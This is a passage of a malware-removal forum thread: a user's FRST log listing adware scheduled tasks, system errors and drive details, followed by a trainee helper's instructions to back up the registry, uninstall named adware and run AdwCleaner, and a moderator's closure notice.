Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-11.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-3.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-4.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-7.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\AmiUpdXp.job => C:\Users\Cukwenk\AppData\Local\14536\Updater.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\Crossbrowse.job => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: C:\Windows\Tasks\DriverToolkit Autorun.job => C:\Program Files\DriverToolkit\DriverToolkit.exe
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0c79a310c975b.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}.job => C:\PROGRAM FILES\RISING\RAV\rsdelaylauncher.exe
Task: C:\Windows\Tasks\Run_Dregol.job => 0x01060100A1E2683921082D40B69A880387797C794600E4000000000044440000200000000014730F000000000013040000208021DF07070002000E000C000600000055000000350043003A005C00550073006500720073005C00430075006B00770065006E006B005C0041007000700044006100740061005C004C006F00630061006C005C007B00380035003500300042007E0031005C0055004E0049004E00530054007E0031002E00450058004500000007002F0043006800650063006B00000000000800430075006B00770065006E006B0000000000000008000000000000000000010030000000D3070700050000000000000000000600A00500003C0000000000000001000000010000000000000000000000
Task: C:\Windows\Tasks\TuneInPro.job => c:\programdata\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}\setup.exe <==== ATTENTION
Task: C:\Windows\Tasks\User_Feed_Synchronization-{3616E477-7CF5-4B18-A6F2-C9A0B002010D}.job => C:\Windows\system32\msfeedssync.exe

==================== Loaded Modules (Whitelisted) ==============

2015-07-25 12:02 - 2015-07-25 12:02 - 00481632 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\sqlite.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00100704 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\tinyxml.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00088416 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\zlib.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00203104 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQFileFlt.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00063840 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\plugins\qmiemalrtpplugin\qmiemalrtpplugin.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00039776 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00018784 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\oDayProtect.dll
2015-07-25 11:30 - 2015-07-25 11:30 - 00161792 _____ () C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp
2015-07-25 12:02 - 2015-07-25 12:02 - 00137568 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libexpatw.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00092184 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\xGraphic32.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00342040 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\arkGraphic.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00045920 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\jgImage.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00158048 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libpng.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00285024 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libjpegturbo.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00014176 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\jgIOStub.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00194912 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\xImage.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00076128 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\MemDefrag.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00235872 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMWlanMacDll.dll
2011-08-22 10:19 - 2011-08-22 10:19 - 11219328 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2015-07-25 12:10 - 2013-12-10 17:01 - 00104728 ____N () C:\PROGRAM FILES\RISING\RAV\CMPB.DLL
2015-07-25 12:10 - 2013-12-10 17:01 - 00069400 ____N () C:\PROGRAM FILES\RISING\RAV\CMPCUsb.dll
2011-11-25 13:48 - 2011-11-25 13:48 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Oexufafono => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3110752661-1710530649-2414096437-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Cucuk\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{004E616C-5715-4AA6-B64F-C8F72F7CB874}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{B89300EE-060D-4C5F-92A8-9DFCA2D96817}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{4D80EB66-F9DC-43A5-B24E-48AD64955945}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{B65324E2-B402-4D84-91B1-6B710A033C3F}] => (Allow) C:\Program Files\TOSHIBA\Wireless LAN Indicator\tosSettings.exe
FirewallRules: [{77025001-6C6F-476B-B8F6-D88EA1C9EBD0}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{F556C665-0C9D-4A69-A0CD-E87C8C12C5AD}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{A0ED1697-3EF7-4081-B6A8-CF3F23FF55F5}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{74BBC9DD-92F6-4321-BBAB-C4486A02CCC2}] => (Allow) C:\Program Files\ASP\unins000.exe
FirewallRules: [{34F6BD4A-37F5-4239-A4BB-0A7F4C1DA03D}] => (Allow) C:\Program Files\TOSHIBA\Utilities\TACSPROP.exe
FirewallRules: [{5C6FF10A-0281-4586-B892-314B3DAAFDB0}] => (Allow) C:\Program Files\TOSHIBA\Utilities\TACSPROP.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-32bit] => (Allow) %systemroot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{60219888-A658-48C6-BED9-569FADA3595B}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: PCI Simple Communications Controller
Description: PCI Simple Communications Controller
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (07/26/2015 09:24:23 AM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/26/2015 01:10:09 AM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 11:00:28 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 10:00:07 PM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Installed AVG 2015). Additional information: 0x80070005.

Error: (07/25/2015 09:59:23 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 08:32:38 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 06:40:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: tosindicator.exe, version: 1.0.15.31, time stamp: 0x4d6b4ad7
Faulting module name: KERNELBASE.dll, version: 6.1.7600.16385, time stamp: 0x4a5bdaae
Exception code: 0xe0434f4d
Fault offset: 0x00009617
Faulting process id: 0x%9
Faulting application start time: 0xtosindicator.exe0
Faulting application path: tosindicator.exe1
Faulting module path: tosindicator.exe2
Report Id: tosindicator.exe3

Error: (07/25/2015 06:39:29 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 05:16:03 PM) (Source: Schedule) (EventID: 0) (User: )
Description: Schedule error: 10106Initialize call failed, bailing out

Error: (07/25/2015 03:41:39 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.


Details:
AddLegacyDriverFiles: Unable to back up image of binary AVGIDSDriver.

System Error:
The system cannot find the file specified.
.


System errors:
=============
Error: (07/26/2015 02:01:30 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The WindowsMangerProtect Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (07/26/2015 09:27:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Update service terminated with the following error:
%%-2147014790

Error: (07/26/2015 09:26:58 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Background Intelligent Transfer Service service terminated with service-specific error %%-2147014790.

Error: (07/26/2015 09:26:58 AM) (Source: Microsoft-Windows-Bits-Client) (EventID: 16392) (User: NT AUTHORITY)
Description: The BITS service failed to start.  Error 2147952506.

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Typewriter High Resolution service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Encyclopaedia Enter service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UfockFuloxo service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network Support Service Updater service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Font Size Favourites service failed to start due to the following error:
%%2

Error: (07/26/2015 09:24:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network HTTP Support Service service failed to start due to the following error:
%%2


Microsoft Office:
=========================

==================== Memory info ===========================

Processor: Intel® Core™ i3-2370M CPU @ 2.40GHz
Percentage of memory in use: 71%
Total physical RAM: 1942.36 MB
Available physical RAM: 555.87 MB
Total Virtual: 3884.72 MB
Available Virtual: 2656.53 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:104.33 GB) (Free:72.04 GB) NTFS
Drive d: () (Fixed) (Total:180.66 GB) (Free:166.14 GB) NTFS
Drive e: () (Fixed) (Total:180.66 GB) (Free:79.61 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 4DB0B0F5)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=104.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=180.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.7 GB) - (Type=07 NTFS)

==================== End of log ============================

Attached Files


Edited by hamluis, 26 July 2015 - 01:59 PM.
Moved from Win 7 to Malware Removal Logs - Hamluis.


BC AdBot (Login to Remove)

 


#2 mAL_rEm018

mAL_rEm018

  • Malware Response Team
  • 308 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:09 AM

Posted 27 July 2015 - 03:37 PM

Please note that all instructions given are customised for this computer only, the tools used may cause damage if used on a computer with different infections.

If you think you have similar problems, please post a log in the Malware Removal forum and wait for help.

Failure to post replies within 3 days will result in this thread being closed.


Hello VickyPratama,

My name is mAL_rEm018, but feel free to call me mAL.  I'm an undergraduate trainee and as such my posts to you have to first be checked by a Teacher, because of this my replies to your posts may be slightly delayed. Please be patient and I'm sure we'll be able to resolve your problems.
 

Please be aware that removing Malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.


Because of this, I advise you to backup any personal files and folders before you start.


Cobian Backup
DriveImage XML


To make sure everything goes smoothly, I would like you to observe the following rules:

  • You must have Administrator rights, permissions for this computer.
  • Please reply to this thread.  Do not start another topic.
  • Perform all actions in the order given.
  • If you don't know, stop and ask!
  • DO NOT run any other fix or removal tools unless instructed to do so!
  • Don't attempt to install any new software (other than those I ask you to) until your computer is clean.
  • DO NOT post for help at any other forum.  Applying fixes from multiple help sites can cause problems.
  • I advise you to print the instructions if possible, since your internet connection might not be available during some of the fixes.
  • Absence of symptoms does not mean that everything is clear, therefore stick with this topic until I give you the "all clear".

I am currently reviewing you logs and will return as soon as possible, with additional instructions.
 


Teacher at the Malware Removal University.

Member of UNITE

 

Failure to post replies within 4 days will result in this thread being closed


#3 mAL_rEm018

mAL_rEm018

  • Malware Response Team
  • 308 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:09 AM

Posted 28 July 2015 - 01:37 PM

Hello VickyPratama,

There is a considerable amout of adware on your computer, therefore it might take a while to get rid of everything.  Before we proceed any further it is necessary that you back up your registry..

Backup your registry using TCRB

  • Download TCRB from the following link TCRB
  • Open Tweaking.com Registry Backup.
  • Click on the Backup Registry tab and ensure that all options are checked.
  • Press on Backup Now.
  • Wait until the backup is complete and exit the program.

Removing programs in Windows 7


  • Click the Star Menu and select Control Panel.
  • Click Programs, then Programs and Features.
  • Select the following programs:

    Advanced-System Protector
    AnyProtect
    AnySend
    Buzzdock
    CinemaPlus-3.2cV05.07
    CinemaPlus-3.2cV14.07
    GamesDesktop 091.005010022
    globalupdate Helper
    GoHD
    GamesDesktop 091.005010022
    globalupdate Helper
    GoHD
    mystartsearch uninstall
    OffersWizard Network System Driver
    Quebles Emoticons
    SavePass 1.1
    shopperz 2.0.0.461
    Software Version Updater
    TrimEdit
    Wajam

  • Select Uninstall.
  • When prompted select Yes.
  • Answer any questions attentively.
  • When the process is finished, please restart your computer.

Note: you can only remove one program at a time.

Next..

Adwcleaner


  • Close all your programs and right-click AdwCleaner.exe and select Run as administrator.
  • Click on Scan.
  • After the scan is over, select Cleaning.
  • Note: All programs will be closed and your computer will be rebooted, therefore I advise you to save any unsaved work.
  • A notepad window will open.  Please copy/paste the contents in your next reply.

I need to see a fresh FRST scan..



  • Right-click on FRST.exe
  • Select Run as administrator.
  • Ensure that Addition.txt is checked.
  • Click on Scan.
  • When the scan is over, two logs will open (FRST.txt and Addition.txt)
  • Post FRST.txt and Addition.txt in your next reply.


-----------------------------------------
In your next reply, I would like to see..

  • Did you have trouble performing any of the steps?
  • Please give me an update on your computer performance.
  • AdwCleaner log.
  • FRST.txt
  • Addition.txt
    Please post everything in the order given.

Edited by mAL_rEm018, 28 July 2015 - 07:08 PM.

Teacher at the Malware Removal University.

Member of UNITE

 

Failure to post replies within 4 days will result in this thread being closed


#4 Cypher

Cypher

  • Malware Response Team
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 31 July 2015 - 03:09 PM

Due to the lack of feedback, this topic is now closed.
In the event you still have problems, please send a Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
 


Admin/Teacher at Malware Removal University

Member of...
Posted Image
Posted Image




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users